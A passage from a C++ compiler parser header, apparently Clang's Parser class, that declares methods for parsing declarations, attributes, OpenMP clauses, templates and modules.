DeclSpecContext DSC = DSC_normal,
LateParsedAttrList *LateAttrs = nullptr);
bool DiagnoseMissingSemiAfterTagDefinition(DeclSpec &DS, AccessSpecifier AS,
DeclSpecContext DSContext,
LateParsedAttrList *LateAttrs = nullptr);
void ParseSpecifierQualifierList(DeclSpec &DS, AccessSpecifier AS = AS_none,
DeclSpecContext DSC = DSC_normal);
void ParseObjCTypeQualifierList(ObjCDeclSpec &DS,
Declarator::TheContext Context);
void ParseEnumSpecifier(SourceLocation TagLoc, DeclSpec &DS,
const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, DeclSpecContext DSC);
void ParseEnumBody(SourceLocation StartLoc, Decl *TagDecl);
void ParseStructUnionBody(SourceLocation StartLoc, unsigned TagType,
Decl *TagDecl);
void ParseStructDeclaration(
ParsingDeclSpec &DS,
llvm::function_ref<void(ParsingFieldDeclarator &)> FieldsCallback);
bool isDeclarationSpecifier(bool DisambiguatingWithExpression = false);
bool isTypeSpecifierQualifier();
/// isKnownToBeTypeSpecifier - Return true if we know that the specified token
/// is definitely a type-specifier. Return false if it isn't part of a type
/// specifier or if we're not sure.
bool isKnownToBeTypeSpecifier(const Token &Tok) const;
/// \brief Return true if we know that we are definitely looking at a
/// decl-specifier, and isn't part of an expression such as a function-style
/// cast. Return false if it's no a decl-specifier, or we're not sure.
bool isKnownToBeDeclarationSpecifier() {
if (getLangOpts().CPlusPlus)
return isCXXDeclarationSpecifier() == TPResult::True;
return isDeclarationSpecifier(true);
}
/// isDeclarationStatement - Disambiguates between a declaration or an
/// expression statement, when parsing function bodies.
/// Returns true for declaration, false for expression.
bool isDeclarationStatement() {
if (getLangOpts().CPlusPlus)
return isCXXDeclarationStatement();
return isDeclarationSpecifier(true);
}
/// isForInitDeclaration - Disambiguates between a declaration or an
/// expression in the context of the C 'clause-1' or the C++
// 'for-init-statement' part of a 'for' statement.
/// Returns true for declaration, false for expression.
bool isForInitDeclaration() {
if (getLangOpts().CPlusPlus)
return isCXXSimpleDeclaration(/*AllowForRangeDecl=*/true);
return isDeclarationSpecifier(true);
}
/// \brief Determine whether this is a C++1z for-range-identifier.
bool isForRangeIdentifier();
/// \brief Determine whether we are currently at the start of an Objective-C
/// class message that appears to be missing the open bracket '['.
bool isStartOfObjCClassMessageMissingOpenBracket();
/// \brief Starting with a scope specifier, identifier, or
/// template-id that refers to the current class, determine whether
/// this is a constructor declarator.
bool isConstructorDeclarator(bool Unqualified);
/// \brief Specifies the context in which type-id/expression
/// disambiguation will occur.
enum TentativeCXXTypeIdContext {
TypeIdInParens,
TypeIdUnambiguous,
TypeIdAsTemplateArgument
};
/// isTypeIdInParens - Assumes that a '(' was parsed and now we want to know
/// whether the parens contain an expression or a type-id.
/// Returns true for a type-id and false for an expression.
bool isTypeIdInParens(bool &isAmbiguous) {
if (getLangOpts().CPlusPlus)
return isCXXTypeId(TypeIdInParens, isAmbiguous);
isAmbiguous = false;
return isTypeSpecifierQualifier();
}
bool isTypeIdInParens() {
bool isAmbiguous;
return isTypeIdInParens(isAmbiguous);
}
/// \brief Checks if the current tokens form type-id or expression.
/// It is similar to isTypeIdInParens but does not suppose that type-id
/// is in parenthesis.
bool isTypeIdUnambiguously() {
bool IsAmbiguous;
if (getLangOpts().CPlusPlus)
return isCXXTypeId(TypeIdUnambiguous, IsAmbiguous);
return isTypeSpecifierQualifier();
}
/// isCXXDeclarationStatement - C++-specialized function that disambiguates
/// between a declaration or an expression statement, when parsing function
/// bodies. Returns true for declaration, false for expression.
bool isCXXDeclarationStatement();
/// isCXXSimpleDeclaration - C++-specialized function that disambiguates
/// between a simple-declaration or an expression-statement.
/// If during the disambiguation process a parsing error is encountered,
/// the function returns true to let the declaration parsing code handle it.
/// Returns false if the statement is disambiguated as expression.
bool isCXXSimpleDeclaration(bool AllowForRangeDecl);
/// isCXXFunctionDeclarator - Disambiguates between a function declarator or
/// a constructor-style initializer, when parsing declaration statements.
/// Returns true for function declarator and false for constructor-style
/// initializer. Sets 'IsAmbiguous' to true to indicate that this declaration
/// might be a constructor-style initializer.
/// If during the disambiguation process a parsing error is encountered,
/// the function returns true to let the declaration parsing code handle it.
bool isCXXFunctionDeclarator(bool *IsAmbiguous = nullptr);
struct ConditionDeclarationOrInitStatementState;
enum class ConditionOrInitStatement {
Expression, ///< Disambiguated as an expression (either kind).
ConditionDecl, ///< Disambiguated as the declaration form of condition.
InitStmtDecl, ///< Disambiguated as a simple-declaration init-statement.
Error ///< Can't be any of the above!
};
/// \brief Disambiguates between the different kinds of things that can happen
/// after 'if (' or 'switch ('. This could be one of two different kinds of
/// declaration (depending on whether there is a ';' later) or an expression.
ConditionOrInitStatement
isCXXConditionDeclarationOrInitStatement(bool CanBeInitStmt);
bool isCXXTypeId(TentativeCXXTypeIdContext Context, bool &isAmbiguous);
bool isCXXTypeId(TentativeCXXTypeIdContext Context) {
bool isAmbiguous;
return isCXXTypeId(Context, isAmbiguous);
}
/// TPResult - Used as the result value for functions whose purpose is to
/// disambiguate C++ constructs by "tentatively parsing" them.
enum class TPResult {
True, False, Ambiguous, Error
};
/// \brief Based only on the given token kind, determine whether we know that
/// we're at the start of an expression or a type-specifier-seq (which may
/// be an expression, in C++).
///
/// This routine does not attempt to resolve any of the trick cases, e.g.,
/// those involving lookup of identifiers.
///
/// \returns \c TPR_true if this token starts an expression, \c TPR_false if
/// this token starts a type-specifier-seq, or \c TPR_ambiguous if it cannot
/// tell.
TPResult isExpressionOrTypeSpecifierSimple(tok::TokenKind Kind);
/// isCXXDeclarationSpecifier - Returns TPResult::True if it is a
/// declaration specifier, TPResult::False if it is not,
/// TPResult::Ambiguous if it could be either a decl-specifier or a
/// function-style cast, and TPResult::Error if a parsing error was
/// encountered. If it could be a braced C++11 function-style cast, returns
/// BracedCastResult.
/// Doesn't consume tokens.
TPResult
isCXXDeclarationSpecifier(TPResult BracedCastResult = TPResult::False,
bool *HasMissingTypename = nullptr);
/// Given that isCXXDeclarationSpecifier returns \c TPResult::True or
/// \c TPResult::Ambiguous, determine whether the decl-specifier would be
/// a type-specifier other than a cv-qualifier.
bool isCXXDeclarationSpecifierAType();
/// \brief Determine whether an identifier has been tentatively declared as a
/// non-type. Such tentative declarations should not be found to name a type
/// during a tentative parse, but also should not be annotated as a non-type.
bool isTentativelyDeclared(IdentifierInfo *II);
// "Tentative parsing" functions, used for disambiguation. If a parsing error
// is encountered they will return TPResult::Error.
// Returning TPResult::True/False indicates that the ambiguity was
// resolved and tentative parsing may stop. TPResult::Ambiguous indicates
// that more tentative parsing is necessary for disambiguation.
// They all consume tokens, so backtracking should be used after calling them.
TPResult TryParseSimpleDeclaration(bool AllowForRangeDecl);
TPResult TryParseTypeofSpecifier();
TPResult TryParseProtocolQualifiers();
TPResult TryParsePtrOperatorSeq();
TPResult TryParseOperatorId();
TPResult TryParseInitDeclaratorList();
TPResult TryParseDeclarator(bool mayBeAbstract, bool mayHaveIdentifier=true);
TPResult
TryParseParameterDeclarationClause(bool *InvalidAsDeclaration = nullptr,
bool VersusTemplateArg = false);
TPResult TryParseFunctionDeclarator();
TPResult TryParseBracketDeclarator();
TPResult TryConsumeDeclarationSpecifier();
public:
TypeResult ParseTypeName(SourceRange *Range = nullptr,
Declarator::TheContext Context
= Declarator::TypeNameContext,
AccessSpecifier AS = AS_none,
Decl **OwnedType = nullptr,
ParsedAttributes *Attrs = nullptr);
private:
void ParseBlockId(SourceLocation CaretLoc);
// Check for the start of a C++11 attribute-specifier-seq in a context where
// an attribute is not allowed.
bool CheckProhibitedCXX11Attribute() {
assert(Tok.is(tok::l_square));
if (!getLangOpts().CPlusPlus11 || NextToken().isNot(tok::l_square))
return false;
return DiagnoseProhibitedCXX11Attribute();
}
bool DiagnoseProhibitedCXX11Attribute();
void CheckMisplacedCXX11Attribute(ParsedAttributesWithRange &Attrs,
SourceLocation CorrectLocation) {
if (!getLangOpts().CPlusPlus11)
return;
if ((Tok.isNot(tok::l_square) || NextToken().isNot(tok::l_square)) &&
Tok.isNot(tok::kw_alignas))
return;
DiagnoseMisplacedCXX11Attribute(Attrs, CorrectLocation);
}
void DiagnoseMisplacedCXX11Attribute(ParsedAttributesWithRange &Attrs,
SourceLocation CorrectLocation);
void stripTypeAttributesOffDeclSpec(ParsedAttributesWithRange &Attrs,
DeclSpec &DS, Sema::TagUseKind TUK);
void ProhibitAttributes(ParsedAttributesWithRange &attrs) {
if (!attrs.Range.isValid()) return;
DiagnoseProhibitedAttributes(attrs);
attrs.clear();
}
void DiagnoseProhibitedAttributes(ParsedAttributesWithRange &attrs);
// Forbid C++11 attributes that appear on certain syntactic
// locations which standard permits but we don't supported yet,
// for example, attributes appertain to decl specifiers.
void ProhibitCXX11Attributes(ParsedAttributesWithRange &Attrs,
unsigned DiagID);
/// \brief Skip C++11 attributes and return the end location of the last one.
/// \returns SourceLocation() if there are no attributes.
SourceLocation SkipCXX11Attributes();
/// \brief Diagnose and skip C++11 attributes that appear in syntactic
/// locations where attributes are not allowed.
void DiagnoseAndSkipCXX11Attributes();
/// \brief Parses syntax-generic attribute arguments for attributes which are
/// known to the implementation, and adds them to the given ParsedAttributes
/// list with the given attribute syntax. Returns the number of arguments
/// parsed for the attribute.
unsigned
ParseAttributeArgsCommon(IdentifierInfo *AttrName, SourceLocation AttrNameLoc,
ParsedAttributes &Attrs, SourceLocation *EndLoc,
IdentifierInfo *ScopeName, SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void MaybeParseGNUAttributes(Declarator &D,
LateParsedAttrList *LateAttrs = nullptr) {
if (Tok.is(tok::kw___attribute)) {
ParsedAttributes attrs(AttrFactory);
SourceLocation endLoc;
ParseGNUAttributes(attrs, &endLoc, LateAttrs, &D);
D.takeAttributes(attrs, endLoc);
}
}
void MaybeParseGNUAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr,
LateParsedAttrList *LateAttrs = nullptr) {
if (Tok.is(tok::kw___attribute))
ParseGNUAttributes(attrs, endLoc, LateAttrs);
}
void ParseGNUAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr,
LateParsedAttrList *LateAttrs = nullptr,
Declarator *D = nullptr);
void ParseGNUAttributeArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax,
Declarator *D);
IdentifierLoc *ParseIdentifierLoc();
void MaybeParseCXX11Attributes(Declarator &D) {
if (getLangOpts().CPlusPlus11 && isCXX11AttributeSpecifier()) {
ParsedAttributesWithRange attrs(AttrFactory);
SourceLocation endLoc;
ParseCXX11Attributes(attrs, &endLoc);
D.takeAttributes(attrs, endLoc);
}
}
void MaybeParseCXX11Attributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr) {
if (getLangOpts().CPlusPlus11 && isCXX11AttributeSpecifier()) {
ParsedAttributesWithRange attrsWithRange(AttrFactory);
ParseCXX11Attributes(attrsWithRange, endLoc);
attrs.takeAllFrom(attrsWithRange);
}
}
void MaybeParseCXX11Attributes(ParsedAttributesWithRange &attrs,
SourceLocation *endLoc = nullptr,
bool OuterMightBeMessageSend = false) {
if (getLangOpts().CPlusPlus11 &&
isCXX11AttributeSpecifier(false, OuterMightBeMessageSend))
ParseCXX11Attributes(attrs, endLoc);
}
void ParseCXX11AttributeSpecifier(ParsedAttributes &attrs,
SourceLocation *EndLoc = nullptr);
void ParseCXX11Attributes(ParsedAttributesWithRange &attrs,
SourceLocation *EndLoc = nullptr);
/// \brief Parses a C++-style attribute argument list. Returns true if this
/// results in adding an attribute to the ParsedAttributes list.
bool ParseCXX11AttributeArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs, SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc);
IdentifierInfo *TryParseCXX11AttributeIdentifier(SourceLocation &Loc);
void MaybeParseMicrosoftAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr) {
if (getLangOpts().MicrosoftExt && Tok.is(tok::l_square))
ParseMicrosoftAttributes(attrs, endLoc);
}
void ParseMicrosoftUuidAttributeArgs(ParsedAttributes &Attrs);
void ParseMicrosoftAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr);
void MaybeParseMicrosoftDeclSpecs(ParsedAttributes &Attrs,
SourceLocation *End = nullptr) {
const auto &LO = getLangOpts();
if (LO.DeclSpecKeyword && Tok.is(tok::kw___declspec))
ParseMicrosoftDeclSpecs(Attrs, End);
}
void ParseMicrosoftDeclSpecs(ParsedAttributes &Attrs,
SourceLocation *End = nullptr);
bool ParseMicrosoftDeclSpecArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs);
void ParseMicrosoftTypeAttributes(ParsedAttributes &attrs);
void DiagnoseAndSkipExtendedMicrosoftTypeAttributes();
SourceLocation SkipExtendedMicrosoftTypeAttributes();
void ParseMicrosoftInheritanceClassAttributes(ParsedAttributes &attrs);
void ParseBorlandTypeAttributes(ParsedAttributes &attrs);
void ParseOpenCLKernelAttributes(ParsedAttributes &attrs);
void ParseOpenCLQualifiers(ParsedAttributes &Attrs);
/// \brief Parses opencl_unroll_hint attribute if language is OpenCL v2.0
/// or higher.
/// \return false if error happens.
bool MaybeParseOpenCLUnrollHintAttribute(ParsedAttributes &Attrs) {
if (getLangOpts().OpenCL)
return ParseOpenCLUnrollHintAttribute(Attrs);
return true;
}
/// \brief Parses opencl_unroll_hint attribute.
/// \return false if error happens.
bool ParseOpenCLUnrollHintAttribute(ParsedAttributes &Attrs);
void ParseNullabilityTypeSpecifiers(ParsedAttributes &attrs);
VersionTuple ParseVersionTuple(SourceRange &Range);
void ParseAvailabilityAttribute(IdentifierInfo &Availability,
SourceLocation AvailabilityLoc,
ParsedAttributes &attrs,
SourceLocation *endLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
Optional<AvailabilitySpec> ParseAvailabilitySpec();
ExprResult ParseAvailabilityCheckExpr(SourceLocation StartLoc);
void ParseObjCBridgeRelatedAttribute(IdentifierInfo &ObjCBridgeRelated,
SourceLocation ObjCBridgeRelatedLoc,
ParsedAttributes &attrs,
SourceLocation *endLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseTypeTagForDatatypeAttribute(IdentifierInfo &AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseAttributeWithTypeArg(IdentifierInfo &AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseTypeofSpecifier(DeclSpec &DS);
SourceLocation ParseDecltypeSpecifier(DeclSpec &DS);
void AnnotateExistingDecltypeSpecifier(const DeclSpec &DS,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ParseUnderlyingTypeSpecifier(DeclSpec &DS);
void ParseAtomicSpecifier(DeclSpec &DS);
ExprResult ParseAlignArgument(SourceLocation Start,
SourceLocation &EllipsisLoc);
void ParseAlignmentSpecifier(ParsedAttributes &Attrs,
SourceLocation *endLoc = nullptr);
VirtSpecifiers::Specifier isCXX11VirtSpecifier(const Token &Tok) const;
VirtSpecifiers::Specifier isCXX11VirtSpecifier() const {
return isCXX11VirtSpecifier(Tok);
}
void ParseOptionalCXX11VirtSpecifierSeq(VirtSpecifiers &VS, bool IsInterface,
SourceLocation FriendLoc);
bool isCXX11FinalKeyword() const;
/// DeclaratorScopeObj - RAII object used in Parser::ParseDirectDeclarator to
/// enter a new C++ declarator scope and exit it when the function is
/// finished.
class DeclaratorScopeObj {
Parser &P;
CXXScopeSpec &SS;
bool EnteredScope;
bool CreatedScope;
public:
DeclaratorScopeObj(Parser &p, CXXScopeSpec &ss)
: P(p), SS(ss), EnteredScope(false), CreatedScope(false) {}
void EnterDeclaratorScope() {
assert(!EnteredScope && "Already entered the scope!");
assert(SS.isSet() && "C++ scope was not set!");
CreatedScope = true;
P.EnterScope(0); // Not a decl scope.
if (!P.Actions.ActOnCXXEnterDeclaratorScope(P.getCurScope(), SS))
EnteredScope = true;
}
~DeclaratorScopeObj() {
if (EnteredScope) {
assert(SS.isSet() && "C++ scope was cleared ?");
P.Actions.ActOnCXXExitDeclaratorScope(P.getCurScope(), SS);
}
if (CreatedScope)
P.ExitScope();
}
};
/// ParseDeclarator - Parse and verify a newly-initialized declarator.
void ParseDeclarator(Declarator &D);
/// A function that parses a variant of direct-declarator.
typedef void (Parser::*DirectDeclParseFunction)(Declarator&);
void ParseDeclaratorInternal(Declarator &D,
DirectDeclParseFunction DirectDeclParser);
enum AttrRequirements {
AR_NoAttributesParsed = 0, ///< No attributes are diagnosed.
AR_GNUAttributesParsedAndRejected = 1 << 0, ///< Diagnose GNU attributes.
AR_GNUAttributesParsed = 1 << 1,
AR_CXX11AttributesParsed = 1 << 2,
AR_DeclspecAttributesParsed = 1 << 3,
AR_AllAttributesParsed = AR_GNUAttributesParsed |
AR_CXX11AttributesParsed |
AR_DeclspecAttributesParsed,
AR_VendorAttributesParsed = AR_GNUAttributesParsed |
AR_DeclspecAttributesParsed
};
void ParseTypeQualifierListOpt(DeclSpec &DS,
unsigned AttrReqs = AR_AllAttributesParsed,
bool AtomicAllowed = true,
bool IdentifierRequired = false);
void ParseDirectDeclarator(Declarator &D);
void ParseDecompositionDeclarator(Declarator &D);
void ParseParenDeclarator(Declarator &D);
void ParseFunctionDeclarator(Declarator &D,
ParsedAttributes &attrs,
BalancedDelimiterTracker &Tracker,
bool IsAmbiguous,
bool RequiresArg = false);
bool ParseRefQualifier(bool &RefQualifierIsLValueRef,
SourceLocation &RefQualifierLoc);
bool isFunctionDeclaratorIdentifierList();
void ParseFunctionDeclaratorIdentifierList(
Declarator &D,
SmallVectorImpl<DeclaratorChunk::ParamInfo> &ParamInfo);
void ParseParameterDeclarationClause(
Declarator &D,
ParsedAttributes &attrs,
SmallVectorImpl<DeclaratorChunk::ParamInfo> &ParamInfo,
SourceLocation &EllipsisLoc);
void ParseBracketDeclarator(Declarator &D);
void ParseMisplacedBracketDeclarator(Declarator &D);
//===--------------------------------------------------------------------===//
// C++ 7: Declarations [dcl.dcl]
/// The kind of attribute specifier we have found.
enum CXX11AttributeKind {
/// This is not an attribute specifier.
CAK_NotAttributeSpecifier,
/// This should be treated as an attribute-specifier.
CAK_AttributeSpecifier,
/// The next tokens are '[[', but this is not an attribute-specifier. This
/// is ill-formed by C++11 [dcl.attr.grammar]p6.
CAK_InvalidAttributeSpecifier
};
CXX11AttributeKind
isCXX11AttributeSpecifier(bool Disambiguate = false,
bool OuterMightBeMessageSend = false);
void DiagnoseUnexpectedNamespace(NamedDecl *Context);
DeclGroupPtrTy ParseNamespace(unsigned Context, SourceLocation &DeclEnd,
SourceLocation InlineLoc = SourceLocation());
void ParseInnerNamespace(std::vector<SourceLocation>& IdentLoc,
std::vector<IdentifierInfo*>& Ident,
std::vector<SourceLocation>& NamespaceLoc,
unsigned int index, SourceLocation& InlineLoc,
ParsedAttributes& attrs,
BalancedDelimiterTracker &Tracker);
Decl *ParseLinkage(ParsingDeclSpec &DS, unsigned Context);
Decl *ParseExportDeclaration();
DeclGroupPtrTy ParseUsingDirectiveOrDeclaration(
unsigned Context, const ParsedTemplateInfo &TemplateInfo,
SourceLocation &DeclEnd, ParsedAttributesWithRange &attrs);
Decl *ParseUsingDirective(unsigned Context,
SourceLocation UsingLoc,
SourceLocation &DeclEnd,
ParsedAttributes &attrs);
struct UsingDeclarator {
SourceLocation TypenameLoc;
CXXScopeSpec SS;
SourceLocation TemplateKWLoc;
UnqualifiedId Name;
SourceLocation EllipsisLoc;
void clear() {
TypenameLoc = TemplateKWLoc = EllipsisLoc = SourceLocation();
SS.clear();
Name.clear();
}
};
bool ParseUsingDeclarator(unsigned Context, UsingDeclarator &D);
DeclGroupPtrTy ParseUsingDeclaration(unsigned Context,
const ParsedTemplateInfo &TemplateInfo,
SourceLocation UsingLoc,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none);
Decl *ParseAliasDeclarationAfterDeclarator(
const ParsedTemplateInfo &TemplateInfo, SourceLocation UsingLoc,
UsingDeclarator &D, SourceLocation &DeclEnd, AccessSpecifier AS,
ParsedAttributes &Attrs, Decl **OwnedType = nullptr);
Decl *ParseStaticAssertDeclaration(SourceLocation &DeclEnd);
Decl *ParseNamespaceAlias(SourceLocation NamespaceLoc,
SourceLocation AliasLoc, IdentifierInfo *Alias,
SourceLocation &DeclEnd);
//===--------------------------------------------------------------------===//
// C++ 9: classes [class] and C structs/unions.
bool isValidAfterTypeSpecifier(bool CouldBeBitfield);
void ParseClassSpecifier(tok::TokenKind TagTokKind, SourceLocation TagLoc,
DeclSpec &DS, const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, bool EnteringContext,
DeclSpecContext DSC,
ParsedAttributesWithRange &Attributes);
void SkipCXXMemberSpecification(SourceLocation StartLoc,
SourceLocation AttrFixitLoc,
unsigned TagType,
Decl *TagDecl);
void ParseCXXMemberSpecification(SourceLocation StartLoc,
SourceLocation AttrFixitLoc,
ParsedAttributesWithRange &Attrs,
unsigned TagType,
Decl *TagDecl);
ExprResult ParseCXXMemberInitializer(Decl *D, bool IsFunction,
SourceLocation &EqualLoc);
bool ParseCXXMemberDeclaratorBeforeInitializer(Declarator &DeclaratorInfo,
VirtSpecifiers &VS,
ExprResult &BitfieldSize,
LateParsedAttrList &LateAttrs);
void MaybeParseAndDiagnoseDeclSpecAfterCXX11VirtSpecifierSeq(Declarator &D,
VirtSpecifiers &VS);
DeclGroupPtrTy ParseCXXClassMemberDeclaration(
AccessSpecifier AS, AttributeList *Attr,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
ParsingDeclRAIIObject *DiagsFromTParams = nullptr);
DeclGroupPtrTy ParseCXXClassMemberDeclarationWithPragmas(
AccessSpecifier &AS, ParsedAttributesWithRange &AccessAttrs,
DeclSpec::TST TagType, Decl *Tag);
void ParseConstructorInitializer(Decl *ConstructorDecl);
MemInitResult ParseMemInitializer(Decl *ConstructorDecl);
void HandleMemberFunctionDeclDelays(Declarator& DeclaratorInfo,
Decl *ThisDecl);
//===--------------------------------------------------------------------===//
// C++ 10: Derived classes [class.derived]
TypeResult ParseBaseTypeSpecifier(SourceLocation &BaseLoc,
SourceLocation &EndLocation);
void ParseBaseClause(Decl *ClassDecl);
BaseResult ParseBaseSpecifier(Decl *ClassDecl);
AccessSpecifier getAccessSpecifierIfPresent() const;
bool ParseUnqualifiedIdTemplateId(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool EnteringContext,
ParsedType ObjectType,
UnqualifiedId &Id,
bool AssumeTemplateId);
bool ParseUnqualifiedIdOperator(CXXScopeSpec &SS, bool EnteringContext,
ParsedType ObjectType,
UnqualifiedId &Result);
//===--------------------------------------------------------------------===//
// OpenMP: Directives and clauses.
/// Parse clauses for '#pragma omp declare simd'.
DeclGroupPtrTy ParseOMPDeclareSimdClauses(DeclGroupPtrTy Ptr,
CachedTokens &Toks,
SourceLocation Loc);
/// \brief Parses declarative OpenMP directives.
DeclGroupPtrTy ParseOpenMPDeclarativeDirectiveWithExtDecl(
AccessSpecifier &AS, ParsedAttributesWithRange &Attrs,
DeclSpec::TST TagType = DeclSpec::TST_unspecified,
Decl *TagDecl = nullptr);
/// \brief Parse 'omp declare reduction' construct.
DeclGroupPtrTy ParseOpenMPDeclareReductionDirective(AccessSpecifier AS);
/// \brief Parses simple list of variables.
///
/// \param Kind Kind of the directive.
/// \param Callback Callback function to be called for the list elements.
/// \param AllowScopeSpecifier true, if the variables can have fully
/// qualified names.
///
bool ParseOpenMPSimpleVarList(
OpenMPDirectiveKind Kind,
const llvm::function_ref<void(CXXScopeSpec &, DeclarationNameInfo)> &
Callback,
bool AllowScopeSpecifier);
/// \brief Parses declarative or executable directive.
///
/// \param Allowed ACK_Any, if any directives are allowed,
/// ACK_StatementsOpenMPAnyExecutable - if any executable directives are
/// allowed, ACK_StatementsOpenMPNonStandalone - if only non-standalone
/// executable directives are allowed.
///
StmtResult
ParseOpenMPDeclarativeOrExecutableDirective(AllowedContsructsKind Allowed);
/// \brief Parses clause of kind \a CKind for directive of a kind \a Kind.
///
/// \param DKind Kind of current directive.
/// \param CKind Kind of current clause.
/// \param FirstClause true, if this is the first clause of a kind \a CKind
/// in current directive.
///
OMPClause *ParseOpenMPClause(OpenMPDirectiveKind DKind,
OpenMPClauseKind CKind, bool FirstClause);
/// \brief Parses clause with a single expression of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSingleExprClause(OpenMPClauseKind Kind);
/// \brief Parses simple clause of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSimpleClause(OpenMPClauseKind Kind);
/// \brief Parses clause with a single expression and an additional argument
/// of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSingleExprWithArgClause(OpenMPClauseKind Kind);
/// \brief Parses clause without any additional arguments.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPClause(OpenMPClauseKind Kind);
/// \brief Parses clause with the list of variables of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPVarListClause(OpenMPDirectiveKind DKind,
OpenMPClauseKind Kind);
public:
/// Parses simple expression in parens for single-expression clauses of OpenMP
/// constructs.
/// \param RLoc Returned location of right paren.
ExprResult ParseOpenMPParensExpr(StringRef ClauseName, SourceLocation &RLoc);
/// Data used for parsing list of variables in OpenMP clauses.
struct OpenMPVarListDataTy {
Expr *TailExpr = nullptr;
SourceLocation ColonLoc;
CXXScopeSpec ReductionIdScopeSpec;
DeclarationNameInfo ReductionId;
OpenMPDependClauseKind DepKind = OMPC_DEPEND_unknown;
OpenMPLinearClauseKind LinKind = OMPC_LINEAR_val;
OpenMPMapClauseKind MapTypeModifier = OMPC_MAP_unknown;
OpenMPMapClauseKind MapType = OMPC_MAP_unknown;
bool IsMapTypeImplicit = false;
SourceLocation DepLinMapLoc;
};
/// Parses clauses with list.
bool ParseOpenMPVarList(OpenMPDirectiveKind DKind, OpenMPClauseKind Kind,
SmallVectorImpl<Expr *> &Vars,
OpenMPVarListDataTy &Data);
bool ParseUnqualifiedId(CXXScopeSpec &SS, bool EnteringContext,
bool AllowDestructorName,
bool AllowConstructorName,
ParsedType ObjectType,
SourceLocation& TemplateKWLoc,
UnqualifiedId &Result);
private:
//===--------------------------------------------------------------------===//
// C++ 14: Templates [temp]
// C++ 14.1: Template Parameters [temp.param]
Decl *ParseDeclarationStartingWithTemplate(unsigned Context,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none,
AttributeList *AccessAttrs = nullptr);
Decl *ParseTemplateDeclarationOrSpecialization(unsigned Context,
SourceLocation &DeclEnd,
AccessSpecifier AS,
AttributeList *AccessAttrs);
Decl *ParseSingleDeclarationAfterTemplate(
unsigned Context,
const ParsedTemplateInfo &TemplateInfo,
ParsingDeclRAIIObject &DiagsFromParams,
SourceLocation &DeclEnd,
AccessSpecifier AS=AS_none,
AttributeList *AccessAttrs = nullptr);
bool ParseTemplateParameters(unsigned Depth,
SmallVectorImpl<Decl*> &TemplateParams,
SourceLocation &LAngleLoc,
SourceLocation &RAngleLoc);
bool ParseTemplateParameterList(unsigned Depth,
SmallVectorImpl<Decl*> &TemplateParams);
bool isStartOfTemplateTypeParameter();
Decl *ParseTemplateParameter(unsigned Depth, unsigned Position);
Decl *ParseTypeParameter(unsigned Depth, unsigned Position);
Decl *ParseTemplateTemplateParameter(unsigned Depth, unsigned Position);
Decl *ParseNonTypeTemplateParameter(unsigned Depth, unsigned Position);
void DiagnoseMisplacedEllipsis(SourceLocation EllipsisLoc,
SourceLocation CorrectLoc,
bool AlreadyHasEllipsis,
bool IdentifierHasName);
void DiagnoseMisplacedEllipsisInDeclarator(SourceLocation EllipsisLoc,
Declarator &D);
// C++ 14.3: Template arguments [temp.arg]
typedef SmallVector<ParsedTemplateArgument, 16> TemplateArgList;
bool ParseGreaterThanInTemplateList(SourceLocation &RAngleLoc,
bool ConsumeLastToken,
bool ObjCGenericList);
bool ParseTemplateIdAfterTemplateName(TemplateTy Template,
SourceLocation TemplateNameLoc,
const CXXScopeSpec &SS,
bool ConsumeLastToken,
SourceLocation &LAngleLoc,
TemplateArgList &TemplateArgs,
SourceLocation &RAngleLoc);
bool AnnotateTemplateIdToken(TemplateTy Template, TemplateNameKind TNK,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &TemplateName,
bool AllowTypeAnnotation = true);
void AnnotateTemplateIdTokenAsType();
bool IsTemplateArgumentList(unsigned Skip = 0);
bool ParseTemplateArgumentList(TemplateArgList &TemplateArgs);
ParsedTemplateArgument ParseTemplateTemplateArgument();
ParsedTemplateArgument ParseTemplateArgument();
Decl *ParseExplicitInstantiation(unsigned Context,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none);
//===--------------------------------------------------------------------===//
// Modules
DeclGroupPtrTy ParseModuleDecl();
DeclGroupPtrTy ParseModuleImport(SourceLocation AtLoc);
bool parseMisplacedModuleImport();
bool tryParseMisplacedModuleImport() {
tok::TokenKind Kind = Tok.getKind();
